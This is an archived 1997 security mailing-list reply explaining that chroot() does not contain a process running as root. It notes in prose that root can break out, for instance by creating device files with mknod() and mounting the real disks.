At 05:05 PM 11/13/97 -0500, Douglas R. Steinbaum wrote:
>Regarding the comment made by Steve Bellovin (pasted at the end of this
>message):
>
>I was under the impression that running the chroot() command on a UNIX
>box would make it impossible for all subsequently launched programs to
>access files located above the newly defined root point, even if such
>programs are launched with a UID of 0. Thus, the command could be used
>as a simple "wrapper" to prevent a user application program which is not
>completely trusted (for example, a commercial SW package for which source
>code is unavailable) from being misused to access critical system files.
>That is, chroot could be run to define the root point such that critical
>files are inaccessible, and then the untrusted application would
>subsequently be launched. Is this not correct?
That was precisely my point -- that this opinion is not correct. There
are numerous ways for root to break out of a chroot() "jail"; the simplest
is to do mknod() to create new special device files for the real disks, and
mount new file systems on those devices. Many other variants are possible
as well.
Received on Nov 14 1997
Intro
